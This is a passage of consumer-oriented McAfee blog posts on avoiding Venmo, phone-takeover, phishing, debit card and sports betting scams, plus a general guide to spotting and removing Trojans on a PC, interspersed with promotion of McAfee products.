    ·       Payments from Strangers

    ·       Offers to Make Money Fast

    ·       Paper Check Scam

    ·       Romance Scam

     

    Venmo has thorough instructions to combat these scams and breaks them down in detail on its site. They also provide preventative tips and steps to take if you unfortunately fall victim to one of these scams. Broadly speaking, though, avoiding Venmo scams breaks down into a few straightforward steps.

    How to avoid getting scammed on Venmo

    1) Never share private details.

    Scammers often pose as customer service reps to pump info out of their victims. They’ll ask for things like bank account info, debit card or credit card numbers, or even passwords and authentication codes sent to your phone. Never share this info. Legitimate reps from legitimate companies like Venmo won’t request it.

    2) Know when Venmo might ask for your Social Security number.

    In the U.S., Venmo is regulated by the Treasury Department. As such, Venmo might require your SSN in certain circumstances. Venmo details the cases where they might need your SSN for reporting, here on their website. Note that this is an exception to what we say about sharing SSNs and tax ID numbers. As a payment app, Venmo might have legitimate reasons to request it. However, don’t send this info by email or text (any email or text that asks you to do that is a scam). Instead, always use the mobile app by going to Settings  –> Identity Verification.

    3) Keep an eye out for scam emails and texts.

    Venmo always sends communications through its official “venmo.com” domain name. If you receive an email that claims to be from Venmo but that doesn’t use “venmo.com,” it’s a scam. Never click or tap on links in emails or texts supposedly sent by Venmo.

    4) Be suspicious of the messages you get. Imposters are afoot.

    Another broad category of scams includes people who aren’t who they say they are. In the case of Venmo, scammers will create imposter accounts that look like they might be a friend or family member but aren’t. If you receive an unexpected and likely urgent-sounding request for payment, contact that person outside the app. See if it’s really them.

    5) When sending money, keep an eye open for alerts from the app.

    Just recently, Venmo added a new feature, dynamic alerts, which helps protect people when sending money via the “Friends and Family” option. It pops up an alert if the app detects a potentially fraudulent transaction and includes info that describes the level of risk involved. In the cases of highly risky payments, Venmo might decline the transaction altogether. This adds another level of protection to Friends and Family payments, which are non-refundable in cases of fraud. Further, this underscores another important point about using Venmo: only pay people you absolutely know and trust.

    More ways to stay safe on Venmo

    Keep your transactions private. Venmo has a social component that can display a transaction between two people and allow others to comment on it. Payment amounts are always secret. Yet you have control over who sees what by adjusting your privacy settings:

    • Public – Everyone on the internet can see and comment on the transaction.
    • Friends – Only your Venmo friends and the other participant’s friends can see and comment on the transaction. (Note that the friends of the other participant might be strangers to you, so “friends and friends of friends” is more accurate here.)
    • Private – Here, only the participants can view and comment on the transaction.

    This brings up the question, what if the participants in the transaction have different privacy settings? Venmo uses the most restrictive one. So, if you’re paying someone who has their privacy set to “Public” and you have yours set to “Private,” the transaction will indeed be private.

    We suggest going private with your account. The less financial information you share, the better. You can set your transactions to private by heading into the Settings of the Venmo app, tapping on Privacy, and then selecting Private.

    In short, just because something is designed to be social doesn’t mean it should become a treasure trove of personal data about your spending habits.

    Add extra layers of security. Take extra precautions that make it difficult for others to access your Venmo app.

    • First off, lock your phone. Whether with a PIN or other form of protection, locking your phone prevents access to everything you keep on it, which is important in the case of loss or theft. Our own research found that only 58% of adults take the vital step of locking their phones. If you fall into the 42% of people who don’t, strongly consider changing that.
    • Within the Venmo app, you can also enable Face ID and a PIN (on iOS) or a PIN and biometric unlock (Android). These add a further layer of security by asking for identification each time you open the app. That way, even if someone gets access to your phone, they’ll still have to leap through that security hurdle to access your Venmo app.
    • Use a strong, unique password for your account. That’s a password with at least 13 characters using a mix of cases, numbers, and symbols that you don’t use anywhere else. You can also have a password manager do that work for you across all your accounts.

    Keep your online finances even more secure with the right tools

    Online protection software like ours offers several additional layers of security when it comes to your safety and finances online.

    For starters, it includes Web Protection and Scam Detector that can block malicious and questionable links that might lead you down the road to malware or a phishing scam, such as a phony Venmo link designed to steal your login credentials. It also includes a password manager that creates and stores strong, unique passwords for each of your accounts.

    Moreover, it further protects you by locking down your identity online. Transaction Monitoring and Credit Monitoring help you spot any questionable financial activity quickly. And if identity theft unfortunately happens to you, up to $2 million in ID theft coverage & restoration can help you recover quickly.

    The post Venmo 101: Making Safer Payments with the App appeared first on McAfee Blog.

    This Week in Scams: New Alerts for iPhone and Android Users and a Major Google Crackdown

    By: McAfee

    Welcome back to another This Week in Scams.

    This week,  have attacks that take over Androids and iPhones, plus news that Google has gone on the offensive against phishing websites.

    First up, a heads-up for iPhone owners.

    The “We found your iPhone” scam

    In the hands of a scammer, “Find My” can quickly turn into “Scam Me.”

    Switzerland’s National Cyber Security Center (NCSC) shared word this week of a new scam that turns the otherwise helpful “Find My” iOS feature into an avenue of attack.

    Now, the thought of losing your phone, along with all the important and precious things you have on it, is enough to give you goosebumps. Luckily, the “Find My” can help you track it down and even post a personalized message on the lock screen to help with its return. And that’s where the scam kicks in.

    From the NCSC:

    When a device is marked as lost, the owner can display a message on the lock screen containing contact details, such as a phone number or email address. This can be very helpful if the finder is honest – but in dishonest hands, the same information can be used to launch a targeted phishing attack.

    With that, scammers send a targeted phishing text, as seen in the sample provided by the NCSC below …

    A smartphone screenshot showing a fraudulent text message claiming a lost iPhone 14 has been located and instructing the recipient to click a link. A large red diagonal stamp reading “Betrug / Fraud” overlays the message, indicating it is a scam.
    Source: NCSC, Switzerland

    What do the scammers want once you tap that link? They request your Apple ID and password, which effectively hands your phone over to them—along with everything on it and everything else that’s associated with your Apple ID.

    It’s a scam you can easily avoid. So even if you’re still stuck with a lost phone that’s likely in the hands of a scammer the point of consolation is that, without your ID, the phone is useless to them.

    Here’s what the NCSC suggests:

    Ignore such messages. The most important rule is Apple will never contact you by text message or email to inform you that a lost device has been found.

    Never click on links in unsolicited messages or enter your Apple ID credentials on a linked website.

    If you lose your device, act immediately. Enable Lost Mode straight away via the Find My app on another device or at iCloud.com/find. This will lock the device.

    Be careful about which contact details you show on your lost device’s lock screen. For example, use a dedicated email address created specifically for this purpose. Never remove the device from your Apple account, as this would disable the Activation Lock.

    Make sure your SIM card is protected with a PIN. This simple yet effective measure prevents criminals from gaining access to your phone number.

    Android phone takeover scam

    Now, a different attack aimed at Android owners …

    A story shared on Fox this week breaks down how a combination of paid search ads, remote access tools, and social engineering have led to hijacked Android phones.

    It starts with a search, where an Android owner looks up a bank, a tech support company, or what have you. Instead of getting a legitimate result, they get a link to a bogus site via paid search results that appear above organic search results. The link, and the page it takes them to, look quite convincing, given the ease with which scammers can spin up ads and sites today. (More on that next.)

    Once there, they call a support number and get connected to a phony agent. The agent convinces the victim to download an app that will help the “agent” solve their issue with their account or phone. In fact, the app is a remote access tool that gives control of the phone, and everything on it, to the scammer. That means they can steal passwords, send messages to friends, family, or anyone at all, and even go so far as to lock you out.

    Basically, this scam hands over one of your most precious possessions to a scammer.

    Here’s how you can avoid that:

    Skip paid search results for extra security. That’s particularly true when contacting your bank or other companies you’re doing business with. Look for their official website in the organic search results below paid ads. Better yet, contact places like your bank or credit card company by calling the number on the back of your card.

    Get a scam detector. A combination of our Scam Detector and Web Protection can call out sketchy links, like the bogus paid links here. They’ll even block malicious sites if you accidentally tap a bad link.

    Never download apps from third-party sites outside of the Google Play Store. Google has checks in place to spot malicious apps in its store.

    Lastly, never give anyone access to your phone. No bank rep needs it. So if someone on a call asks you to download an app like TeamViewer, AnyDesk, or AirDroid, it’s a scam. Hang up.

    Beyond that, you can protect yourself further by installing an app like our McAfee Security: Antivirus VPN. You can pick it up in the Google Play store, which also includes our Scam Detector and Identity Monitoring. You can also get it as part of your McAfee+ protection.

    Google takes aim at phishing scams with a lawsuit against an alleged criminal organization

    Just Wednesday, Google took a first step toward making the internet safer from bogus sites, per a story filed by National Public Radio.

    A lawsuit alleges that a China-based company called “Lighthouse” runs a “Phishing-as-a-Service” operation that outfits scammers with quick and easy tools and templates for creating convincing-looking websites. According to Google’s general counsel, these sites could “compromise between 12.7 and 115 million credit cards in the U.S. alone.

    The suit was filed in the U.S. District Court in the Southern District of New York, which, of course, has no jurisdiction over a China-based company. The aim, per Google’s counsel, is deterrence. From the article:

    “It allows us a legal basis on which to go to other platforms and services and ask for their assistance in taking down different components of this particular illegal infrastructure,” she said, without naming which platforms or services Google might focus on. “Even if we can’t get to the individuals, the idea is to deter the overall infrastructure in some cases.”

    We’ll keep an eye on this case as it progresses. And in the meantime, it’s a good reminder to get Scam Detector and Web Protection on all your devices so you don’t get hoodwinked by these increasingly convincing-looking scam sites.

    Again, scammers can roll them out so quickly and easily today.

    And now for a quick roundup …

    Here’s a quick list of a few stories that caught our eye this week:

    Alarmingly realistic deepfake threats now target banks in South Africa

    Nearly 80% of parents fear their kids will fall for an AI scam, but they aren’t sure how to talk about it

    Hyundai data breach exposes 2.7 million Social Security numbers

     

    And that’s it for this week! We’ll see you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: New Alerts for iPhone and Android Users and a Major Google Crackdown appeared first on McAfee Blog.

    Best Ways to Check for a Trojan on Your PC

    By: McAfee

    Trojan horse malware was recently in the news after researchers discovered that an email contained an innocent-looking .pdf file attachment. CSO Online magazine reported that when the attachment was clicked, a permission request popped up, and the email recipient clicked “allow,” initiating the document download and save, and executing the malware.

    Trojans continue to be one of the most widespread cyber threats globally, accounting for 58% of all malware, as reported by Dataprot.net, as criminals adapt their methods to bypass increasingly advanced security measures. But all is not lost. In this guide, we will take a closer look at how you can detect Trojans on your computer and share ways to detect and remove them.

    What is a Trojan?

    A Trojan, often referred to as a Trojan horse, is a type of malicious software that disguises itself as a legitimate program to deceive users into installing it on their devices. Its name is taken from the story of Odysseus, who hid his Greek soldiers inside a wooden gift horse to infiltrate the city of Troy.

    While the term “Trojan virus” is commonly used, a Trojan is not technically a virus. Both are types of malware, but they behave differently. A virus is a piece of code that attaches itself to other programs and, when run, replicates itself to spread to other files and systems. A Trojan, however, is a standalone program that cannot self-replicate. It relies entirely on tricking the user into downloading and executing it.

    From their beginnings in the 1980s as simple social engineering tricks with limited technical sophistication, modern Trojans have dramatically transformed to become multi-stage campaigns that use legitimate-looking emails, fake software updates, and compromised websites to deliver malware that can remain undetected for months. Recently, Trojan attacks have exploited the supply chain to target software vendors directly, allowing criminals to distribute the malware through channels that consumers trust.

    The dangers that Trojans bring

    The dangers of a Trojan are extensive, ranging from direct financial loss to a complete invasion of your privacy. Once a Trojan enters your PC, cybercriminals can steal sensitive credentials for your banking and credit card accounts, which can lead directly to theft. They can also access and exfiltrate personal files, photos, and documents, creating a severe privacy exposure.

    Beyond theft, an attacker can use this access to take complete control of your device. They might install other types of malware, such as ransomware or spyware, use your computer as part of a botnet to attack others, or simply monitor your every keystroke. This total loss of device control and privacy is one of the biggest dangers. However, these risks are manageable if caught early. This demonstrates the importance of layered protection with real-time monitoring and community intelligence. As cybercrime attack methods evolve, your security needs to evolve as well.

    Methods of spreading Trojans

    • Phishing emails: These legitimate-looking emails contain malicious attachments or links that, when opened, install the Trojan. To avoid getting infected, never open attachments from unsolicited sources.
    • Cracked software: Websites offering free versions of paid software often bundle malware, including Trojans, with the download. That “free” software could cost you everything. View such offers with a healthy dose of skepticism. Always use legitimate, official software.
    • Fake updates: Pop-ups pretending to be legitimate updates for software like Adobe Flash Player can trick you. To update your software, it is best to visit the official website directly.
    • Malvertising: Malicious ads on legitimate websites can redirect you to pages that automatically download malware. When these online ads pop up, be cautious about clicking them.

    The Trojan invasion process

    A Trojan infection follows a stealthy, multi-stage process. The delivery stage begins with a lure, where social engineering tactics, such as a convincing email or a free software offer, trick you into downloading and opening a malicious file. In the execution stage, you run the seemingly harmless program and unknowingly trigger the Trojan’s installation. The malware then often embeds itself into your system’s startup processes to ensure it persistently runs every time you turn on your PC. From there, it connects to a remote command-and-control server operated by the attacker, awaiting instructions for its malicious actions, such as stealing your credentials or monitoring your activity.

    Types of Trojan malware

    Trojans come in different forms, each with their own process of attack. Here are some of them:

    • Backdoor Trojans: These create a hidden backdoor, bypassing normal authentication measures. These backdoors often remain hidden for long periods, allowing attackers to steal files, or install additional malware without your knowledge.
    • Keylogger Trojans: Once installed, these Trojans persistently remotely control your PC, recording your keyboard strokes to capture passwords, accessing your files, and taking screen captures.
    • Banker Trojans: As the name suggests, these Trojans are designed to steal your login credentials for online banking, payment systems, and credit card accounts. They work by hijacking browser sessions, injecting fake login pages, or capturing keystrokes to steal your credentials and manipulate your transactions.
    • Downloader Trojans: These Trojans act as delivery mechanisms for other malware. One type, downloaders, connect to remote servers to fetch additional malicious payloads after initial infection. Another type, known as droppers, carries other malware within their code and deploy it directly upon execution.
    • DDoS Trojans: They turn infected computers into zombie-like “bots” that participate in Distributed Denial-of-Service attacks that overwhelm and crash websites, servers, and online services, causing outages or financial damage.
    • Scareware or fake antivirus Trojans: This type of malware mimics legitimate security software, showing fake virus alerts to scare you into paying for a “premium” but useless version or further compromise the device.

    Real-life Trojan attacks

    • Banking credential theft: The Zeus Trojan family spread through fake banking emails with links to infected websites. Once installed, it secretly captured online banking passwords and credit card details as users typed them. This led to millions of dollars in stolen funds and compromised accounts worldwide, forcing banks to implement stronger authentication measures.
    • Corporate data exfiltration: Emotet initially appeared as urgent invoice attachments and shipping notifications in business emails. After infection, it silently collected email contacts, login credentials, and sensitive documents from corporate networks. Companies faced significant data breaches, regulatory fines, and damaged customer trust as their confidential information was sold on criminal marketplaces.
    • Botnet recruitment: The Mirai Trojan targeted smart home devices by exploiting default login credentials on routers and security cameras. Infected devices became part of massive botnets used to launch devastating attacks that temporarily shut down major websites and services. At the same time, users remained unaware that their gadgets were being exploited for cyberattacks.
    • Multi-stage attacks: TrickBot masqueraded as software updates and legitimate business documents. Aside from stealing banking information, it installed ransomware that encrypted entire networks. Organizations faced operational shutdowns, hefty ransom demands, and costly recovery efforts that sometimes took months to complete.

    By understanding the signs of a Trojan virus presence on your computer and using comprehensive security software, you dramatically reduce the danger and protect your digital life.

    Signs of Trojan presence on your PC

    A Trojan attack isn’t just a single event; it’s the entire process a cybercriminal uses to trick you into running malicious software. Recognizing the early warning signs is key. Here are some of the most common cues that can help you know if you have a Trojan virus attack in progress.

    • Slower-than-usual computer performance: Trojans often install additional malware that consumes computer processing units and memory resources. This can significantly slow your computer down and cause your operating system to become unstable and sluggish.
    • Unauthorized apps appear: A common symptom of Trojan infection is the sudden appearance of apps you don’t recall downloading or installing. If you notice an unfamiliar app from an unverified developer in your Windows Task Manager, there’s a good chance that it is malicious software installed by a Trojan.
    • Operating system crashes and freezes: Trojans can overwhelm your system, causing recurring crashes and freezes. An example of this is the Blue Screen of Death, a Windows error screen that means the system can no longer operate due to hardware failure or the termination of an important process.
    • Frequent browser redirects: A Trojan can manipulate your browser or modify the Domain Name System settings to redirect the user to malicious websites. Frequent redirects are a red flag, so scan your computer immediately if you notice an increase in these redirect patterns.
    • Aggressive popups: If you’re noticing more pop-up ads than usual, especially those claiming your web browser or a media player is out of date, there’s a strong possibility that a Trojan has installed a malicious adware program on your PC. These fake alerts trick you into installing the Trojan instead of a real update.
    • Disabled security and other software. Trojans can interfere with applications and prevent them from running. A common mid-attack behavior is the Trojan deactivating your browser, as well as apps such as word processing and spreadsheet software, or your antivirus or firewall. It’s a major red flag.
    • Unexpected password requests: The Trojan may display a fake system prompt asking you to re-enter your computer password or credentials for an online account, which it then captures.
    • Constant, unexplained network activity: Your computer’s internet connection may seem unusually busy even when you’re not using it. This could be the Trojan communicating with a remote server.

    Recognizing these signs early allows you to act quickly. If something feels off, trusting your instincts and running a scan can help you identify and contain a threat before it causes significant harm.

    4 best ways to check for a Trojan on your PC

    If you’re noticing any of the symptoms above, it’s time to investigate further using automated tools and manual checks. A layered approach is the most effective way to identify and confirm a Trojan infection. To get started, follow the steps below:

    1. Scan your PC

    The first step is to scan your PC using an antivirus software. Plenty of scan options are available on the market offering real-time protection from all types of malicious software threats, including viruses, rootkits, spyware, adware, ransomware, and Trojans. Some even feature on-demand and scheduled scanning of files and apps, an advanced firewall for home network security, and compatibility with Windows, macOS, Android, and iOS devices.

    2. Search for Trojans while in safe mode

    The next step is to search for Trojans while your computer is in safe mode. In this phase, your device will run only the basic programs necessary for Microsoft Windows operation, making it easier to identify any unfamiliar or suspicious programs. Here’s how to do it:

    1. Type “MSCONFIG.” in the search bar from the Start menu.
    2. Click on the “Boot” tab in the System Configuration box.
    3. Tick “Safe Mode” and click “Apply,” then “OK.”
    4. After the system restarts, re-open the configuration box.
    5. Click on “Startup.”
    6. Examine the list and see if there are any suspicious files.
    7. Disable any you deem suspicious.

    3. Check processes in Windows Task Manager

    Another effective way to detect if Trojans are in your system is to check the processes running in Windows Task Manager. This will allow you to see if there are any unfamiliar and unauthorized malicious programs or suspicious activity.

    To go to the Task Manager, press Ctrl+Alt+Del and click on the “Processes” tab. Review the list of active applications and disable those without verified publishers or those you don’t remember downloading and installing.

    4. Scan with Windows security

    You can also scan your PC using the built-in Windows virus and threat protection tools. Microsoft Defender (formerly known as Windows Defender Security Center in older versions of Windows 10) can perform virus scans and detect various types of malware. These are the parts to note:

    Windows’ built-in security, known as Microsoft Defender, is a capable tool that can detect and remove many common Trojans. For basic protection, it provides a solid first line of defense and is far better than having no security at all. It handles known threats well and is constantly updated by Microsoft.

    However, a dedicated security suite offers more comprehensive, layered protection. This goes beyond simple malware removal to include advanced features like a robust firewall, real-time phishing protection that blocks malicious websites before they load, identity safeguards, and a VPN for secure browsing. These layers work together to stop threats *before* they can infect your PC, which is always better than removing them after the fact.

    Think of it as the difference between a standard lock on your door and a full home security system. For everyday, low-risk browsing, the built-in tool may be enough. However, for anyone who banks, shops, or shares personal information online, the added protection of a comprehensive security suite provides essential peace of mind against a broader range of threats.

    Remember to check your network

    Most Trojans communicate with a remote command-and-control server to receive instructions or send stolen data through your internet connection. By monitoring your network activity, you can spot these hidden connections early. Unusual outbound traffic, unfamiliar IP addresses, or constant background data transfers are all red flags that something malicious might be operating behind the scenes.

    • Monitor active connections: Use the Resource Monitor tool in Windows (resmon.exe) to see which applications are using your network. Look for any unfamiliar processes making outbound connections.
    • Verify DNS and proxy settings: In your Windows network settings, check that your DNS server and proxy settings haven’t been changed. Trojans often alter these to redirect your traffic through malicious servers.
    • Firewall logs: Firewall logs can show repeated attempts by a specific program to connect to the internet, which is a strong indicator of a Trojan trying to communicate with its operator.

    Choose the best Trojan scanner & removal tool

    If you’re in the market for a tool that scans and removes Trojans, you have the option of free or premium tools. Whichever you choose, the key is to act quickly but carefully before the Trojan can cause any lasting damage.

    Free tools are a great step

    A free scan is the perfect first step to determine if you have a Trojan virus on your system. These no-cost tools provide an immediate way to detect potential threats and give you peace of mind about your PC’s security status.

    Free Trojan scanners work by examining your system files, running processes, and common hiding spots where malware typically lurks. They check for known Trojan signatures, suspicious file behaviors, and registry modifications that indicate a possible infection. While they may not catch every advanced threat, they’re excellent for identifying common Trojans and giving you a clear starting point.

    Simple steps to run your free scan

    1. Choose your scanner: Download a reputable, free scanning tool from the official website of a trusted security provider. Ensure your scanner has the latest threat definitions for maximum effectiveness.
    2. Close other programs: Restart your PC in Safe Mode and close any unnecessary applications to improve scan performance and accuracy.
    3. Run a full system scan: Make sure you select the free tool’s comprehensive scan option to check all files, not just a quick scan.
    4. Review the results: Carefully examine any detected threats, noting their names and file locations. When threats are found, most free scanners will categorize them by risk level and provide recommended actions.
    5. Take action on findings: Quarantine or delete identified threats as recommended by the scanner. High-risk items should be immediately quarantined or deleted, while suspicious files may need further analysis. Be careful, as some legitimate files can occasionally trigger false positives.
    6. Restart and rescan: Reboot your PC and run another scan to confirm that the Trojan or any other threat has been completely removed.

    Free scanning tools provide valuable insights into your system’s health and serve as an excellent diagnostic tool to check for Trojan presence. However, they typically offer detection and removal only, without the real-time protection needed to prevent future infections.

    Comprehensive scanning with McAfee antivirus

    For comprehensive security that stops threats before they can infect your system, consider upgrading to a complete security solution that provides continuous monitoring and advanced threat protection. Modern antivirus suites, such as McAfee Total Protection, are expertly designed to detect and block Trojans. They use a layered security model that includes signature detection to identify known malware, behavioral analysis to spot suspicious activities characteristic of a Trojan, and artificial intelligence to protect against the very latest threats. Real-time protection actively scans files as you access them, while scheduled and manual scans allow you to thoroughly check your entire system for any hidden malware.

    McAfee software is especially effective in scanning for Trojans and other types of malware and removing them before they can cause damage to your computer system. With real-time, on-demand, and scheduled scanning of files and applications at your disposal, we’ll help you detect and eliminate any emerging threats in a timely manner.

    Remove the Trojan from any platform

    On any computer platform, whether Windows or macOS, the process of scanning and removing a Trojan with McAfee software is similar and achievable. These steps will help you regain control of your device:

    1. Disconnect your PC: Unplug your Ethernet cable or turn off Wi-Fi to stop the Trojan from communicating online.
    2. Reboot in Safe Mode: Restart your computer in Safe Mode to prevent most malware from loading.
    3. Run a full antivirus scan: Use a trusted tool like McAfee to run a complete scan and quarantine or delete any threats it finds.
    4. For Mac: Run a full system scan with trusted security software designed for this device.
    5. Reset your browsers: Return your web browsers to their default settings to remove any malicious or unfamiliar extensions or changes. Update macOS to the latest version to patch security vulnerabilities.
    6. Reboot and rescan: Restart your PC normally and run a full scan again to confirm the Trojan is completely removed.
    7. Change all your passwords: Once your computer is clean, immediately change passwords for your email, banking, and other important accounts.

    Once you’ve completed the removal process, strengthen your defenses by enabling automatic updates, using reputable security software, and being cautious about downloads and email attachments. Regular system scans and keeping your software current are your best protection against future infections. With these steps, you can confidently clean your devices and prevent repeat attacks.

    Quick tips to prevent a Trojan virus invasion

    • Keep software updated: Enable automatic updates for your operating system, web browser, and applications to patch security vulnerabilities.
    • Scrutinize emails: Do not open attachments or click links from unknown or suspicious senders. Verify requests for information.
    • Use strong, unique passwords: Employ a password manager to create and store complex passwords for each of your online accounts.
    • Enable a firewall: Ensure your network firewall is active to monitor and control incoming and outgoing network traffic.
    • Backup data regularly: Keep regular backups of your important files so you can restore them in case of a ransomware attack or data corruption.
    • Avoid risky downloads: Only download applications from official websites and trusted app stores.
    • Enable multi-factor authentication (MFA): Add this extra security layer to your important online accounts.
    • Use real-time protection: Ensure a comprehensive security suite, such as McAfee, is always running to detect threats instantly.

    FAQs about Trojans

    What is a Trojan horse?

    A Trojan is malware that disguises itself as a legitimate file or program. Once you run it, it can perform malicious actions such as stealing data or giving an attacker remote control of your PC.

    How does a Trojan spread?

    Trojans don’t spread on their own. They rely on you to download and run them. This often happens through phishing emails with fake attachments, malicious ads, or downloads of cracked software.

    Can Macs and phones get infected by Trojans?

    Yes. While less common than on Windows PCs, Trojans exist for all major operating systems, including macOS, Android, and iOS. It’s crucial to only install apps from official app stores to stay safe.

    What is the quickest way to check for a Trojan?

    The fastest and most reliable method to check for a Trojan in your computer is to run a full system scan with a trusted antivirus program. This will check all files and running processes for known threats.

    How long does it take to remove a Trojan?

    Removal time can vary. A good antivirus scan might find and remove it in under an hour. However, some complex Trojans may require more steps, like booting into Safe Mode, which can take longer.

    What should I do immediately after removing a Trojan?

    Once your system is clean, the first thing you should do is change the passwords for all your important accounts, especially email, banking, and social media, as the Trojan may have stolen them.

    Final thoughts

    Wondering if a Trojan has infected your computer can be worrying, but it’s a manageable issue with the right approach. By understanding the signs of a Trojan virus and using the detection methods outlined, you can take back control of your device’s security. To prevent getting infected by a Trojan, proactive measures such as safe online habits and the layered defense of a trusted security suite like McAfee are your best defenses. Stay vigilant and keep your software up to date, so you can confidently navigate the digital world.

    The post Best Ways to Check for a Trojan on Your PC appeared first on McAfee Blog.

    Holiday Shopping 2025: US Fact Sheet 

    By: McAfee

    The holidays are supposed to be about joy and generosity — but this year, they’re also peak season for AI-powered scams. New research from McAfee, a global leader in online protection, shows how fraudsters are using artificial intelligence to create more convincing lures — from deepfake endorsements to cloned delivery messages — as Americans head online to shop.

    US – Holiday Shopping 2025 Fact Sheet 

    The post Holiday Shopping 2025: US Fact Sheet  appeared first on McAfee Blog.

    This Week in Scams: Fake Steaks and Debit Card Porch Pirates

    By: McAfee

    We’re back with a new edition of “This Week in Scams,” a roundup of what’s current and trending in all things sketchy online.

    This week, we have fake steaks, why you should shop online with a credit card, and a new and utterly brash form of debit card fraud.

    Fake steaks from “0maha Steaks”

    Yes, the letter “O” for Omaha in the subject line of this email scam is actually a zero. And that’s not the only thing that’s off with this email, it’s a total scam.

    An image of a scam 0maha Steaks email.

     

    If you like your choice cuts, the name Omaha Steaks might be a familiar one. They’ve been around for almost 110 years, and since 1953 they’ve been in the mail order meat business. Today, they sell, well, just about anything you can picture in the butcher or seafood case. With that, the company enjoys a premium reputation, so it’s little surprise scammers have latched onto it and built a phishing attack around the brand—one they garnish with a nod to concerns over rising food prices.

    A few things can quickly tip you off to this scam. For starters, the scammers oddly spell Omaha with a zero in the subject line, as mentioned. From there, the sender’s email address is a straight ref flag. In this case, it’s the curiously spelled “steaksamplnext” followed by a (redacted) domain name that isn’t the legitimate omahasteaks dot-com address. Also curious is the lack of an actual price for the bogus “Gourmet Box.” And lastly, you might think that a premium foods brand would showcase some pictures of their famous fare in the email. Not so here.

    Rounding it out, you’ll see the classic scammer tactics of scarcity and urgency, which scammers hope will pressure people to act immediately. In this case, only 500 of these supposed boxes are available, and the offer “concludes tomorrow.”

    How to avoid Omaha Steak scams and phishing scams like them

    Even as this scam makes the rounds, it’s easy to spot if you give it a closer look and a little thought—giving it a sort of old-school feel to it. However, more and more of today’s phishing emails look increasingly legit, thanks to AI tools, which might get you to click.

    As for phishing attacks like this in general, you can protect yourself by:

    Always checking the email address of the sender. If it doesn’t match the proper address of the company or brand that’s supposedly sending the email, it’s a scam. In this case, from the people at Omaha Steaks themselves, “If it doesn’t show OmahaSteaks.com and @OmahaSteaks, it’s not us!”

    Looking for addresses and links that look like they’ve been slightly altered so that they seem “close enough” to the real thing. In this case, the scammer didn’t even bother to try. However, you could expect an alteration like “omahasteakofferforyou.com” to try and look legit.

    Getting a scam detector. Our Scam Detector, found in all core McAfee plans, helps you stay safer with advanced scam detection technology built to spot and stop scams across text messages, emails, and videos. It’ll also block those sites if you accidentally tap or click on a bad link.

    One good reason for using your credit card when shopping online.

    What’s the most common kind of fraud? If you said, “credit card,” you’ll find it number five on the list. The top form is debit cards, according to 2025 findings from the U.S. Federal Reserve.

    As reported by financial institutions, the Fed found that attempts at debit card fraud rose to 73% with 52% of those attempts being successful.

    There’s a good reason for that debit card fraud ranks highest for attempts and success rate. It’s the same reason that credit card fraud is relatively low. Debit cards don’t have the same fraud protections in place that credit cards do.

    As you might have read in our blogs before, credit cards offer additional protection thanks to the Fair Credit Billing Act (FCBA). Your maximum liability is $50 for fraudulent charges on a lost or stolen card if you report the loss to your issuer within 60 days. In the case of relatively unprotected debit cards, those losses often go unrecovered.

    Keep this in mind as you sit down for your online shopping for the holidays: use a credit card instead of a debit card. That gives you the protection of the FCBA if your shopping session gets hacked or if the retailer experiences a data breach somewhere down the road. Also think about making it even safer by shopping with a VPN. Our VPN creates an encrypted “tunnel” that protects your data from crooks and prying eyes, so your card info stays private.

    A new debit card scam with a porch pirate twist

    First reported by the FBI last year, we’re seeing continued reports of a brash and bold form of debit card scam—people physically handing over their cards to scammers.

    The scam starts like many card scams do, with a phone call. Scammers spoof the caller ID of the victim’s bank or credit union, ring them up, and tell them there’s a “problem” with their account. From there, scammers direct victims to cut up their current card—but with a twist. They tell victims to keep the little EMV chip for tap-and-go payments intact.

    Why? Victims get instructed to leave the cut-up card and intact chip in the mailbox for a “courier” to pick up for “security purposes.” Once in hand, scammers get access to the bank account associated with the chip. Even if the scammers don’t wrangle a PIN number out of their victims with a little social engineering trickery, they can still make purchases with the chip as some points of sale don’t require a PIN number when tapping to pay.

    Here’s how you can avoid the “porch pirate” debit card scam

    Shred your old cards in a paper shredder. Then, take the next step. Grab the shredded pieces and throw them away in separate batches. This will all make it fantastically tough for a scammer to piece together your card and steal your info.

    Call back your bank yourself. If you get a call, voicemail, or text saying there’s an issue with your account, you can verify any possible issue yourself by calling the number on the back of your card.

    Know that banks won’t send “couriers” for cards. And they’ll simply never ask you to leave your card in your mailbox.

    Other scam and cybersecurity headlines this week

    That’s our roundup for this week. We’ll catch you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: Fake Steaks and Debit Card Porch Pirates appeared first on McAfee Blog.

    Kickoffs and Rip-offs—Watch Out for Online Betting Scams This Football Season

    By: McAfee

    Football season is in full swing — tailgates, rivalries, fantasy leagues, and Sunday afternoons glued to the screen. Alongside the highlights and heartbreaks, there’s another game playing out online: the rush to place bets.

    Every break in the action brings another sportsbook promo — risk-free wagers, bonus bets, exclusive odds — flooding your feed and inbox. But what you don’t see between the ads and sponsorships is how much money is really in play, or how scammers have joined the lineup.

    Last year, legally licensed online and retail sportsbooks took nearly $150 billion in bets, a 22.2% jump from 2023 according to the American Gaming Association. And with so much of that money flowing through apps and websites, scammers are finding creative new ways to cash in.

    They’re setting up fake betting sites, phishing for logins, and spinning up unlicensed offshore platforms that operate without oversight. Even self-proclaimed “insider tipsters” are pitching guaranteed wins that never exist.

    If sports betting is legal in your state and you’re planning to make some wagers this season, here’s how to keep your money — and your data — safe.

    Is online sports betting legal in my state?

    Since a U.S. Supreme Court ruling in 2018, individual states can determine their own laws for sports betting. Soon after, sports betting became legal in waves. In all, 39 states and Washington D.C. currently offer sports betting through licensed retail locations. Of them, 31 further offer legal sports betting through licensed online apps and websites. The map below offers a quick view as to how all that plays out.

    Map of US states that have legalized sports betting.

    Image from https://sportsdata.usatoday.com/legality-map 

    Even as online sportsbooks must be licensed to operate legally, be aware that the terms and conditions they operate under vary from service to service. Per the Better Business Bureau (BBB), that calls for closely reading their fine print. For one, you might come across language that says the company can “restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, because “like any sales pitch, these can be deceptive.”

    What do online betting scams look like?

    Fake betting sites

    This form of scam follows the same playbook scammers use for all kinds of bogus sites in general. They cook up a copycat site that looks like a legitimate betting site, create a web address that looks like it could be legitimate, and then flood the web with sponsored search results, ads, and social media posts to drive traffic to them. From there, scammers capture payment info and take bogus bets that they never pay out on. Once the site gets discovered as a scam, they pull it down and spin up other scam sites. With the aid of AI tools to help with the process, scammers can turn around scam sites quickly.

    Sports app phishing scams

